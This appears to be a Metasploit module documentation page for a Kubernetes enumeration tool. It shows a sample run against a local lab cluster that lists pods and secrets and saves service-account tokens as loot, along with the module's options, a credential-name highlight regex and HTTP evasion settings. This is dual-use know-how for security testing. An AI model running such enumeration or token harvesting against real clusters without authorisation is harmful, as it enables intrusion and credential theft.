[+] service token vpnkit-controller-token-l9ljz: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_693223.bin

[+] Namespace 4: kubernetes-dashboard
Auth (namespace: kubernetes-dashboard)
======================================

  Resources                                      Non-Resource URLs                    Resource Names  Verbs
  ---------                                      -----------------                    --------------  -----
  *.*                                            []                                   []              [*]
  selfsubjectaccessreviews.authorization.k8s.io  []                                   []              [create]
  selfsubjectrulesreviews.authorization.k8s.io   []                                   []              [create]
                                                 [*]                                  []              [*]
                                                 [/.well-known/openid-configuration]  []              [get]
                                                 [/api/*]                             []              [get]
                                                 [/api]                               []              [get]
                                                 [/apis/*]                            []              [get]
                                                 [/apis]                              []              [get]
                                                 [/healthz]                           []              [get]
                                                 [/healthz]                           []              [get]
                                                 [/livez]                             []              [get]
                                                 [/livez]                             []              [get]
                                                 [/openapi/*]                         []              [get]
                                                 [/openapi]                           []              [get]
                                                 [/openid/v1/jwks]                    []              [get]
                                                 [/readyz]                            []              [get]
                                                 [/readyz]                            []              [get]
                                                 [/version/]                          []              [get]
                                                 [/version/]                          []              [get]
                                                 [/version]                           []              [get]
                                                 [/version]                           []              [get]

Pods (namespace: kubernetes-dashboard)
======================================

  #  namespace             name                                        status   containers                                                                       ip
  -  ---------             ----                                        ------   ----------                                                                       --
  0  kubernetes-dashboard  dashboard-metrics-scraper-856586f554-c2pz5  Running  dashboard-metrics-scraper (image: kubernetesui/metrics-scraper:v1.0.6 TCP:8000)  10.1.1.60
  1  kubernetes-dashboard  kubernetes-dashboard-67484c44f6-4hh4j       Running  kubernetes-dashboard (image: kubernetesui/dashboard:v2.3.1 TCP:8443)             10.1.1.46

Secrets (namespace: kubernetes-dashboard)
=========================================

  #  namespace             name                              type                                 data                    age
  -  ---------             ----                              ----                                 ----                    ---
  0  kubernetes-dashboard  default-token-6gwtz               kubernetes.io/service-account-token  ca.crt,namespace,token  19d
  1  kubernetes-dashboard  kubernetes-dashboard-certs        Opaque                                                       19d
  2  kubernetes-dashboard  kubernetes-dashboard-csrf         Opaque                               csrf                    19d
  3  kubernetes-dashboard  kubernetes-dashboard-key-holder   Opaque                               priv,pub                19d
  4  kubernetes-dashboard  kubernetes-dashboard-token-gfhhr  kubernetes.io/service-account-token  ca.crt,namespace,token  19d

[+] service token default-token-6gwtz: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_854995.bin
[+] service token kubernetes-dashboard-token-gfhhr: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_729795.bin

[*] Auxiliary module execution completed
msf6 auxiliary(cloud/kubernetes/enum_kubernetes) >

Using actions

See available actions:

msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > show actions

Auxiliary actions:

   Name        Description
   ----        -----------
   all         enumerate all resources
   auth        enumerate auth
   namespace   enumerate namespace
   namespaces  enumerate namespaces
   pod         enumerate pod
   pods        enumerate pods
   secret      enumerate secret
   secrets     enumerate secrets
   version     enumerate version

Enumerate pods:

msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > pods
[*] Running module against 127.0.0.1

Pods (namespace: default)
=========================

  #   namespace  name                       status   containers                                       ip
  -   ---------  ----                       ------   ----------                                       --
  0   default    a4bg7r                     Running  iyxz0ujfck9t (image: vulhub/thinkphp:5.0.23)     10.1.1.51
  1   default    appjokbpiiml               Running  iggapn (image: vulhub/thinkphp:5.0.23)           10.1.1.57
  2   default    cvyf4m9le                  Running  t0e93vcuyi (image: vulhub/thinkphp:5.0.23)       10.1.1.53
  3   default    fh4bfdtf                   Running  dygvv (image: vulhub/thinkphp:5.0.23)            10.1.1.52
  4   default    gavp                       Running  jfwdaei (image: vulhub/thinkphp:5.0.23)          10.1.1.58
  5   default    mkfkuwd6hkd1               Running  aoavh (image: vulhub/thinkphp:5.0.23)            10.1.1.62
  6   default    nid7jd                     Running  geb (image: vulhub/thinkphp:5.0.23)              10.1.1.45
  7   default    redis-7fd956df5-sbchb      Running  redis (image: redis:5.0.4 TCP:6379)              10.1.1.56
  8   default    thinkphp-67f7c88cc9-djg6q  Running  thinkphp (image: vulhub/thinkphp:5.0.23 TCP:80)  10.1.1.55
  9   default    thinkphp-67f7c88cc9-l56mg  Running  thinkphp (image: vulhub/thinkphp:5.0.23 TCP:80)  10.1.1.44
  10  default    usuuucs                    Running  xfcw (image: vulhub/thinkphp:5.0.23)             10.1.1.50
  11  default    v2xxl7z                    Running  nu3s (image: vulhub/thinkphp:5.0.23)             10.1.1.61
  12  default    yulfpaohsepk               Running  jjmxkkzgkmy (image: vulhub/thinkphp:5.0.23)      10.1.1.47

[*] Auxiliary module execution completed

Enumerate a single pod by specifying its namespace and name:

msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > pod namespace=default name=redis-7fd956df5-sbchb
[*] Running module against 127.0.0.1
Pods (namespace: default)
=========================

  #  namespace  name                   status   containers                           ip
  -  ---------  ----                   ------   ----------                           --
  0  default    redis-7fd956df5-sbchb  Running  redis (image: redis:5.0.4 TCP:6379)  10.1.1.56


[*] Auxiliary module execution completed

Enumerate a single pod by namespace and name, outputting the result as JSON:

msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > pod namespace=default name=redis-7fd956df5-sbchb output=json 
[*] Running module against 127.0.0.1

[
  {
    "kind": "Pod",
    "apiVersion": "v1",
    "metadata": {
      "name": "redis-7fd956df5-sbchb",
      "generateName": "redis-7fd956df5-",
      "namespace": "default",
      "uid": "0f00c08c-bdb1-4206-94ce-5c447cd2d446",
      "resourceVersion": "629723",
      "creationTimestamp": "2021-09-16T22:33:33Z",
      "labels": {
        "app": "redis",
        "pod-template-hash": "7fd956df5",
        "role": "leader",
        "tier": "backend"
      },
    },
    ... etc ...
  }
]
[*] Auxiliary module execution completed
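The JSON action output above is the raw Pod object as returned by the Kubernetes API, which makes it easy to post-process outside msfconsole. The following Python script is an added example and is not part of the module or of this page: it reads a pod listing in the shape of the `output=json` output and produces a per-pod inventory (namespace, name, images, container ports) plus a list of container environment variable names matching the same default regex the module uses for HIGHLIGHT_NAME_PATTERN. The sample JSON is constructed for this example; only the fields visible in the page's truncated output are reproduced, and `spec.containers` is the standard Kubernetes Pod field with made-up values. Case-insensitive matching is this example's choice, not necessarily the module's behaviour.

```python
import json
import re

# Constructed sample in the shape of the module's `output=json` pod listing.
# kind/apiVersion/metadata mirror the page's truncated output; the spec block
# is the standard Pod field with invented values for this example.
SAMPLE_JSON = """
[
  {
    "kind": "Pod",
    "apiVersion": "v1",
    "metadata": {
      "name": "redis-7fd956df5-sbchb",
      "namespace": "default",
      "labels": {"app": "redis", "role": "leader", "tier": "backend"}
    },
    "spec": {
      "containers": [
        {"name": "redis", "image": "redis:5.0.4",
         "ports": [{"containerPort": 6379, "protocol": "TCP"}],
         "env": [{"name": "REDIS_PASSWORD", "value": "example-not-real"}]}
      ]
    }
  },
  {
    "kind": "Pod",
    "apiVersion": "v1",
    "metadata": {
      "name": "thinkphp-67f7c88cc9-djg6q",
      "namespace": "default",
      "labels": {"app": "thinkphp"}
    },
    "spec": {
      "containers": [
        {"name": "thinkphp", "image": "vulhub/thinkphp:5.0.23",
         "ports": [{"containerPort": 80, "protocol": "TCP"}]}
      ]
    }
  }
]
"""

# Same default pattern as the module's HIGHLIGHT_NAME_PATTERN option;
# the case-insensitive flag is this example's assumption.
HIGHLIGHT_NAME_PATTERN = re.compile(r"username|password|user|pass", re.IGNORECASE)


def summarize_pods(raw):
    """Return one summary dict per pod: where it runs, what it runs, and which
    container env var *names* look credential-like under the highlight regex.
    Values are deliberately not copied so the summary can be shared."""
    pods = json.loads(raw)
    out = []
    for pod in pods:
        if pod.get("kind") != "Pod":
            continue  # skip anything that is not a Pod object
        meta = pod["metadata"]
        containers = pod.get("spec", {}).get("containers", [])
        images = [c["image"] for c in containers]
        ports = sorted(
            f'{p.get("protocol", "TCP")}:{p["containerPort"]}'
            for c in containers for p in c.get("ports", [])
        )
        flagged = sorted(
            e["name"] for c in containers for e in c.get("env", [])
            if HIGHLIGHT_NAME_PATTERN.search(e["name"])
        )
        out.append({
            "namespace": meta.get("namespace", "default"),
            "name": meta["name"],
            "images": images,
            "ports": ports,
            "flagged_env": flagged,
        })
    return out


def images_in_use(raw):
    """Distinct image references across all pods, for comparison against an
    approved-image list or an image scanner's inventory."""
    return sorted({img for pod in summarize_pods(raw) for img in pod["images"]})


if __name__ == "__main__":
    for row in summarize_pods(SAMPLE_JSON):
        print(f'{row["namespace"]}/{row["name"]}: {", ".join(row["images"])} '
              f'ports={row["ports"]} flagged_env={row["flagged_env"]}')
    print("images:", images_in_use(SAMPLE_JSON))
```

To use it on real output, redirect the module's JSON to a file (for example with msfconsole's `spool` command) and pass the file contents to `summarize_pods`; pods whose `flagged_env` list is non-empty are the ones where credentials may be injected as plain environment variables rather than mounted from a Secret, which is the kind of finding the HIGHLIGHT_NAME_PATTERN option is meant to surface.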
Msfconsole Usage


Here is how the cloud/kubernetes/enum_kubernetes auxiliary module looks in the msfconsole:

msf6 > use auxiliary/cloud/kubernetes/enum_kubernetes

msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > show info

       Name: Kubernetes Enumeration
     Module: auxiliary/cloud/kubernetes/enum_kubernetes
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  alanfoster
  Spencer McIntyre

Module side effects:
 ioc-in-logs

Module stability:
 crash-safe

Available actions:
  Name        Description
  ----        -----------
  all         enumerate all resources
  auth        enumerate auth
  namespace   enumerate namespace
  namespaces  enumerate namespaces
  pod         enumerate pod
  pods        enumerate pods
  secret      enumerate secret
  secrets     enumerate secrets
  version     enumerate version

Check supported:
  No

Basic options:
  Name                    Current Setting                                     Required  Description
  ----                    ---------------                                     --------  -----------
  HIGHLIGHT_NAME_PATTERN  username|password|user|pass                         yes       PCRE regex of resource names to highlight
  NAME                                                                        no        The name of the resource to enumerate
  NAMESPACE               default                                             no        The Kubernetes namespace
  NAMESPACE_LIST          default,dev,staging,production,kube-public,kube-no  no        The default namespace list to iterate when the current token does not have the permission to r
                          de-lease,kube-lease,kube-system                               etrieve the available namespaces
  OUTPUT                  table                                               yes       output format to use (Accepted: table, json)
  Proxies                                                                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                                                                      no        The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT                                                                       no        The target port (TCP)
  SESSION                                                                     no        An optional session to use for configuration
  SSL                     true                                                no        Negotiate SSL/TLS for outgoing connections
  TOKEN                                                                       no        Kubernetes API token
  VHOST                                                                       no        HTTP server virtual host

Description:
  Enumerate a Kubernetes API to report useful resources such as 
  available namespaces, pods, secrets, etc. Useful resources will be 
  highlighted using the HIGHLIGHT_NAME_PATTERN option.

Module Options


This is a complete list of options available in the cloud/kubernetes/enum_kubernetes auxiliary module:

msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > show options

Module options (auxiliary/cloud/kubernetes/enum_kubernetes):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   HIGHLIGHT_NAME_PATTERN  username|password|user|pass                         yes       PCRE regex of resource names to highlight
   NAME                                                                        no        The name of the resource to enumerate
   NAMESPACE               default                                             no        The Kubernetes namespace
   NAMESPACE_LIST          default,dev,staging,production,kube-public,kube-no  no        The default namespace list to iterate when the current token does not have the permission to
                           de-lease,kube-lease,kube-system                               retrieve the available namespaces
   OUTPUT                  table                                               yes       output format to use (Accepted: table, json)
   Proxies                                                                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                                      no        The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT                                                                       no        The target port (TCP)
   SESSION                                                                     no        An optional session to use for configuration
   SSL                     true                                                no        Negotiate SSL/TLS for outgoing connections
   TOKEN                                                                       no        Kubernetes API token
   VHOST                                                                       no        HTTP server virtual host

Auxiliary action:

   Name  Description
   ----  -----------
   all   enumerate all resources

Advanced Options


Here is a complete list of advanced options supported by the cloud/kubernetes/enum_kubernetes auxiliary module:

msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > show advanced

Module advanced options (auxiliary/cloud/kubernetes/enum_kubernetes):

   Name                  Current Setting                                     Required  Description
   ----                  ---------------                                     --------  -----------
   DOMAIN                WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                         no        HTTP connection and receive timeout
   HttpPassword                                                              no        The HTTP password to specify for authentication
   HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                              no        The HTTP username to specify for authentication
   SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: A
                                                                                       uto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE               false                                               no        Enable detailed status messages
   WORKSPACE                                                                 no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the cloud/kubernetes/enum_kubernetes module can do:

msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > show actions

Auxiliary actions:

   Name        Description
   ----        -----------
   all         enumerate all resources
   auth        enumerate auth
   namespace   enumerate namespace
   namespaces  enumerate namespaces
   pod         enumerate pod
   pods        enumerate pods
   secret      enumerate secret
   secrets     enumerate secrets
   version     enumerate version

Evasion Options


Here is the full list of possible evasion options supported by the cloud/kubernetes/enum_kubernetes auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request
Authors


  • alanfoster
  • Spencer McIntyre

Version


This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.